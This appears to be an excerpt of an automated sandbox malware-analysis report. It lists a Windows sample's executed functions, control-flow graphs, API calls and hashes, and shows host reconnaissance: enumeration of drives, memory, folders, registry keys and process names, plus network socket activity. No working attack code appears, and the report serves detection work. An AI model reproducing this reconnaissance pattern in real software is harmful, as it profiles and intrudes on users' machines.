88131->88133 88132->88133 88136 7010a17 88132->88136 88134 70109f7 2 API calls 88133->88134 88135 70109f3 88133->88135 88134->88133 88137 7010c14 GetLogicalDrives 88136->88137 88138 7010c0c GetLogicalDrives 88137->88138 88140 7010d92 88138->88140 88140->87919 88142 7010d2f GetLogicalDrives 88141->88142 88144 7010d92 88142->88144 88144->87919 88146 7010aa8 88145->88146 88147 7010c14 GetLogicalDrives 88146->88147 88148 7010c0c GetLogicalDrives 88147->88148 88150 7010d92 88148->88150 88150->87919 88152 7010a34 88151->88152 88153 7010c14 GetLogicalDrives 88152->88153 88154 7010c0c GetLogicalDrives 88153->88154 88156 7010d92 88154->88156 88156->87919 88157 5fb160 Sleep

                                                              Executed Functions

                                                              Function 002AF100 Relevance: 20.1, Strings: 15, Instructions: 1304COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                                              • API String ID: 0-1590685507
                                                              • Opcode ID: a5b46e37954d77858e66ac573b14ceab65c9fbc8328108f74dd5082f13a9234e
                                                              • Instruction ID: 43df421707a7546f59f00f933d5432ab8ba5c80c24ba1c8d0a60f2e7554c8f06
                                                              • Opcode Fuzzy Hash: a5b46e37954d77858e66ac573b14ceab65c9fbc8328108f74dd5082f13a9234e
                                                              • Instruction Fuzzy Hash: 93C2E231A143459FD724CF68C580B6AB7E1BF89314F04CA6DEC989B262DB74ED94CB81
                                                              Function 0027255D Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 282fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 851 27255d-272614 call 5f9f70 GetSystemInfo call 6fed30 call 6fef20 GlobalMemoryStatusEx call 6fed30 call 6fef20 931 272619 call 7010d40 851->931 932 272619 call 7010a83 851->932 933 272619 call 7010c84 851->933 934 272619 call 7010acf 851->934 935 272619 call 7010c50 851->935 936 272619 call 7010b53 851->936 937 272619 call 7010cd2 851->937 938 272619 call 7010c14 851->938 939 272619 call 7010b17 851->939 940 272619 call 7010c1f 851->940 941 272619 call 7010ce1 851->941 942 272619 call 7010a21 851->942 943 272619 call 7010aa0 851->943 944 272619 call 7010d23 851->944 945 272619 call 7010ba3 851->945 946 272619 call 7010be2 851->946 947 272619 call 70109a5 851->947 948 272619 call 7010ae7 851->948 949 272619 call 7010dab 851->949 950 272619 call 7010c6b 851->950 951 272619 call 7010d2a 851->951 952 272619 call 7010b6a 851->952 953 272619 call 7010d6d 851->953 954 272619 call 7010b71 851->954 955 272619 call 7010cf3 851->955 956 272619 call 7010bb3 851->956 957 272619 call 7010a73 851->957 958 272619 call 7010ab2 851->958 959 272619 call 7010cb5 851->959 960 272619 call 7010bf7 851->960 961 272619 call 7010af7 851->961 962 272619 call 70109f7 851->962 963 272619 call 7010c3e 851->963 964 272619 call 7010bbe 851->964 965 272619 call 7010a3e 851->965 966 272619 call 70109fe 851->966 862 27261b-272620 863 272626-272637 call 6feb30 862->863 864 27277c-272904 call 6fed30 call 6fef20 KiUserCallbackDispatcher call 6fed30 call 6fef20 call 6fed30 call 6fef20 SHGetKnownFolderPath call 5f8be0 call 5f8bd0 FindFirstFileW 862->864 869 272754-27275c 863->869 908 272906-272926 FindNextFileW 864->908 909 272928-27292c 864->909 871 272762-272777 call 6fef20 869->871 872 27263c-27264f GetDriveTypeA 869->872 871->864 874 272655-272685 GetDiskFreeSpaceExA 872->874 875 272743-272751 call 5f8b98 872->875 874->875 878 27268b-27273e call 6fee00 call 6fee90 call 6fef20 call 6fec20 call 6fef20 call 6fec20 call 6fef20 call 6fd2a0 874->878 875->869 878->875 908->908 908->909 911 272932-27296f call 6fed30 call 6fef20 call 5f8e78 909->911 912 27292e 909->912 918 272974-272979 911->918 912->911 919 27297b-2729a4 call 6fed30 call 6fef20 918->919 920 2729a9-2729fe call 5fa290 call 6fed30 call 6fef20 918->920 919->920 931->862 932->862 933->862 934->862 935->862 936->862 937->862 938->862 939->862 940->862 941->862 942->862 943->862 944->862 945->862 946->862 947->862 948->862 949->862 950->862 951->862 952->862 953->862 954->862 955->862 956->862 957->862 958->862 959->862 960->862 961->862 962->862 963->862 964->862 965->862 966->862
                                                              APIs
                                                              • GetSystemInfo.KERNELBASE ref: 00272579
                                                              • GlobalMemoryStatusEx.KERNELBASE ref: 002725CC
                                                              • GetDriveTypeA.KERNELBASE ref: 00272647
                                                              • GetDiskFreeSpaceExA.KERNELBASE ref: 0027267E
                                                              • KiUserCallbackDispatcher.NTDLL ref: 002727E2
                                                              • SHGetKnownFolderPath.SHELL32 ref: 0027286D
                                                              • FindFirstFileW.KERNELBASE ref: 002728F8
                                                              • FindNextFileW.KERNELBASE ref: 0027291F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: FileFind$CallbackDiskDispatcherDriveFirstFolderFreeGlobalInfoKnownMemoryNextPathSpaceStatusSystemTypeUser
                                                              • String ID: ;%'$@$`
                                                              • API String ID: 2066228396-129122021
                                                              • Opcode ID: 74e10e0620bc79420139b5587e7262d021f4132d252525afe9676ed33f92ceac
                                                              • Instruction ID: 68baac9c63f4262957e3674a284ffe2d56be353fc2a0d78e466c4eb62d2b25c4
                                                              • Opcode Fuzzy Hash: 74e10e0620bc79420139b5587e7262d021f4132d252525afe9676ed33f92ceac
                                                              • Instruction Fuzzy Hash: 3BD1C1B49157099FCB40EF68D5856AEBBF1FF88304F00886DE998D7310E7359A848F92
                                                              Function 002729FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321registryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1295 2729ff-272a2f FindFirstFileA 1296 272a31-272a36 1295->1296 1297 272a38 1295->1297 1298 272a3d-272a91 call 6fee90 call 6fef20 RegOpenKeyExA 1296->1298 1297->1298 1303 272a93-272a98 1298->1303 1304 272a9a 1298->1304 1305 272a9f-272b0c call 6fee90 call 6fef20 CharUpperA call 5f8da0 1303->1305 1304->1305 1313 272b15 1305->1313 1314 272b0e-272b13 1305->1314 1315 272b1a-272b92 call 6fee90 call 6fef20 call 5f8e80 call 5f8e70 1313->1315 1314->1315 1324 272b94-272ba3 1315->1324 1325 272bcc-272c66 QueryFullProcessImageNameA CloseHandle call 5f8da0 1315->1325 1328 272ba5-272bae 1324->1328 1329 272bb0-272bc0 call 5f8e68 1324->1329 1335 272c6f 1325->1335 1336 272c68-272c6d 1325->1336 1328->1325 1333 272bc5-272bca 1329->1333 1333->1324 1333->1325 1337 272c74-272ce9 call 6fee90 call 6fef20 call 5f8e80 call 5f8e70 1335->1337 1336->1337 1346 272dcf-272e1c call 6fee90 call 6fef20 CloseHandle 1337->1346 1347 272cef-272d49 call 5f8bb0 call 5f8da0 1337->1347 1357 272e23-272e2e 1346->1357 1358 272d4b-272d63 call 5f8da0 1347->1358 1359 272d99-272dad 1347->1359 1360 272e37 1357->1360 1361 272e30-272e35 1357->1361 1358->1359 1368 272d65-272d7d call 5f8da0 1358->1368 1359->1346 1362 272e3c-272ed6 call 6fee90 call 6fef20 1360->1362 1361->1362 1377 272eea 1362->1377 1378 272ed8-272ee1 1362->1378 1368->1359 1373 272d7f-272d97 call 5f8da0 1368->1373 1373->1359 1379 272daf-272dc9 call 5f8e68 1373->1379 1381 272eef-272f16 call 6fee90 call 6fef20 1377->1381 1378->1377 1380 272ee3-272ee8 1378->1380 1379->1346 1379->1347 1380->1381
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                                              • String ID: 0
                                                              • API String ID: 2406880114-4108050209
                                                              • Opcode ID: 10818958f99856f0956f991f10458789b741d01f55243b8776edfaa632f955c4
                                                              • Instruction ID: 2f9d076695653476cba5e6bbda8717d7a13951229c52faca1242330b28c6871c
                                                              • Opcode Fuzzy Hash: 10818958f99856f0956f991f10458789b741d01f55243b8776edfaa632f955c4
                                                              • Instruction Fuzzy Hash: 6BE1F6B0915309DFCB50EF68D9856AEBBF5FF84304F408869E998D7350E77499888F82
                                                              Function 002805B0 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 377networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1535 2805b0-2805b7 1536 2805bd-2805d4 1535->1536 1537 2807ee 1535->1537 1538 2805da-2805e6 1536->1538 1539 2807e7-2807ed 1536->1539 1538->1539 1540 2805ec-2805f0 1538->1540 1539->1537 1541 2805f6-280620 call 287350 call 2770b0 1540->1541 1542 2807c7-2807cc 1540->1542 1547 28066a-28068c call 2adec0 1541->1547 1548 280622-280624 1541->1548 1542->1539 1553 280692-2806a0 1547->1553 1554 2807d6-2807e3 call 287380 1547->1554 1550 280630-280655 call 2770d0 call 2803c0 call 287450 1548->1550 1574 28065b-280668 call 2770e0 1550->1574 1575 2807ce 1550->1575 1558 2806a2-2806a4 1553->1558 1559 2806f4-2806f6 1553->1559 1554->1539 1564 2806b0-2806e4 call 2873b0 1558->1564 1561 2806fc-2806fe 1559->1561 1562 2807ef-28082b call 283000 1559->1562 1566 28072c-280754 1561->1566 1578 280a2f-280a35 1562->1578 1579 280831-280837 1562->1579 1564->1554 1580 2806ea-2806ee 1564->1580 1570 28075f-28078b 1566->1570 1571 280756-28075b 1566->1571 1592 280700-280703 1570->1592 1593 280791-280796 1570->1593 1576 28075d 1571->1576 1577 280707-280719 WSAEventSelect 1571->1577 1574->1547 1574->1550 1575->1554 1586 280723-280726 1576->1586 1577->1554 1585 28071f 1577->1585 1582 280a3c-280a52 1578->1582 1583 280a37-280a3a 1578->1583 1588 280839-28084c call 286fa0 1579->1588 1589 280861-28087e 1579->1589 1580->1564 1581 2806f0 1580->1581 1581->1559 1582->1554 1590 280a58-280a81 call 282f10 1582->1590 1583->1582 1585->1586 1586->1562 1586->1566 1602 280a9c-280aa4 1588->1602 1603 280852 1588->1603 1599 280882-28088d 1589->1599 1590->1554 1608 280a87-280a97 call 286df0 1590->1608 1592->1577 1593->1592 1597 28079c-2807c2 call 2776a0 1593->1597 1597->1592 1606 280970-280975 1599->1606 1607 280893-2808b1 1599->1607 1602->1554 1603->1589 1605 280854-28085f 1603->1605 1605->1599 1609 280a19-280a2c 1606->1609 1610 28097b-280989 call 2770b0 1606->1610 1611 2808c8-2808f7 1607->1611 1608->1554 1609->1578 1610->1609 1618 28098f-28099e 1610->1618 1619 2808f9-2808fb 1611->1619 1620 2808fd-280925 1611->1620 1621 2809b0-2809c1 call 2770d0 1618->1621 1622 280928-28093f 1619->1622 1620->1622 1626 2809a0-2809ae call 2770e0 1621->1626 1627 2809c3-2809c7 1621->1627 1628 2808b3-2808c2 1622->1628 1629 280945-28096b 1622->1629 1626->1609 1626->1621 1631 2809e8-280a03 WSAEnumNetworkEvents 1627->1631 1628->1606 1628->1611 1629->1628 1633 2809d0-2809e6 WSAEventSelect 1631->1633 1634 280a05-280a17 1631->1634 1633->1626 1633->1631 1634->1633
                                                              APIs
                                                              • WSAEventSelect.WS2_32(?,?,?), ref: 00280711
                                                              • WSAEventSelect.WS2_32(?,?,00000000), ref: 002809DD
                                                              • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 002809FC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: EventSelect$EnumEventsNetwork
                                                              • String ID: N='$multi.c
                                                              • API String ID: 2170980988-2025053434
                                                              • Opcode ID: 52c2919eb3e0c7b26ff653c32a5daf452d49d8748cc79ca0dc6a3dbdb16044aa
                                                              • Instruction ID: 1defcca8c0f890eef3746fd337564eb679153e6bd19ca1d3de4b606713931690
                                                              • Opcode Fuzzy Hash: 52c2919eb3e0c7b26ff653c32a5daf452d49d8748cc79ca0dc6a3dbdb16044aa
                                                              • Instruction Fuzzy Hash: D2D1F87962A3029FE750EF60C8C1B6BB7E5FF84704F04482CF98596291E774E968CB52
                                                              Function 0033B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1706 33b180-33b195 1707 33b3e0-33b3e7 1706->1707 1708 33b19b-33b1a2 1706->1708 1709 33b1b0-33b1b9 1708->1709 1709->1709 1710 33b1bb-33b1bd 1709->1710 1710->1707 1711 33b1c3-33b1d0 1710->1711 1713 33b1d6-33b1f2 1711->1713 1714 33b3db 1711->1714 1715 33b229-33b22d 1713->1715 1714->1707 1716 33b233-33b246 1715->1716 1717 33b3e8-33b417 1715->1717 1718 33b260-33b264 1716->1718 1719 33b248-33b24b 1716->1719 1724 33b582-33b589 1717->1724 1725 33b41d-33b429 1717->1725 1723 33b269-33b286 call 33af30 1718->1723 1720 33b215-33b223 1719->1720 1721 33b24d-33b256 1719->1721 1720->1715 1727 33b315-33b33c call 5f8b00 1720->1727 1721->1723 1734 33b2f0-33b301 1723->1734 1735 33b288-33b2a3 call 33b060 1723->1735 1729 33b435-33b44c call 33b590 1725->1729 1730 33b42b-33b433 call 33b590 1725->1730 1737 33b342-33b347 1727->1737 1738 33b3bf-33b3ca 1727->1738 1745 33b458-33b471 call 33b590 1729->1745 1746 33b44e-33b456 call 33b590 1729->1746 1730->1729 1734->1720 1749 33b307-33b310 1734->1749 1752 33b200-33b213 call 33b020 1735->1752 1753 33b2a9-33b2c7 getsockname call 33b020 1735->1753 1742 33b384-33b38f 1737->1742 1743 33b349-33b358 1737->1743 1747 33b3cc-33b3d9 1738->1747 1742->1738 1751 33b391-33b3a5 1742->1751 1750 33b360-33b382 1743->1750 1762 33b473-33b487 1745->1762 1763 33b48c-33b4a7 1745->1763 1746->1745 1747->1707 1749->1747 1750->1742 1750->1750 1756 33b3b0-33b3bd 1751->1756 1752->1720 1764 33b2cc-33b2dd 1753->1764 1756->1738 1756->1756 1762->1724 1766 33b4b3-33b4cb call 33b660 1763->1766 1767 33b4a9-33b4b1 call 33b660 1763->1767 1764->1720 1768 33b2e3 1764->1768 1773 33b4d9-33b4f5 call 33b660 1766->1773 1774 33b4cd-33b4d5 call 33b660 1766->1774 1767->1766 1768->1749 1779 33b4f7-33b50b 1773->1779 1780 33b50d-33b52b call 33b770 * 2 1773->1780 1774->1773 1779->1724 1780->1724 1785 33b52d-33b531 1780->1785 1786 33b533-33b53b 1785->1786 1787 33b580 1785->1787 1788 33b578-33b57e 1786->1788 1789 33b53d-33b547 1786->1789 1787->1724 1788->1724 1789->1788 1790 33b549-33b54d 1789->1790 1790->1788 1791 33b54f-33b558 1790->1791 1791->1788 1792 33b55a-33b576 call 33b870 * 2 1791->1792 1792->1724 1792->1788
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 0033B2B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: 9fd6f4fe3b5cb7d2e4f330617552ce04a2fad3f13c3ca59f27529915279dee25
                                                              • Instruction ID: 741c8a61e6a5a5fd33958f0b8fbf97b1d5f13c178f62cae5fb4901ac85da9523
                                                              • Opcode Fuzzy Hash: 9fd6f4fe3b5cb7d2e4f330617552ce04a2fad3f13c3ca59f27529915279dee25
                                                              • Instruction Fuzzy Hash: C5C16B316043159FD719DF24C8C1A6AB7E1EF89314F058968FA8A8B3A2DB34ED45CB81
                                                              Function 00286FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1556804870.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                              • Associated: 00000000.00000002.1556781955.0000000000270000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1556804870.0000000000997000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558782224.000000000099A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000C3B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D16000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1558804548.0000000000D25000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559190219.0000000000D26000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559336363.0000000000EDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559359660.0000000000EDC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559383699.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1559406514.0000000000EDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_270000_5Jat5RkD3a.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cfa8caae99d279f832c33e0340af897cf11721dd752202b18f978ce157f6237a
                                                              • Instruction ID: a2d6e6c75d1b557e9025c8d1c3d46454d28290c92857aec102803011409bc0d1
                                                              • Opcode Fuzzy Hash: cfa8caae99d279f832c33e0340af897cf11721dd752202b18f978ce157f6237a
                                                              • Instruction Fuzzy Hash: 3991043862E34A4BD735AE2888947BB72D5EFD4364F348B2CE8A9421D4E770DC609781
                                                              Function 0033A8C0 Relevance: 1.5, APIs: 1, Instructions: 39COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0032712E,?,?,?,00001001,00000000), ref: 0033A90D
                                                              Memory Dump Source
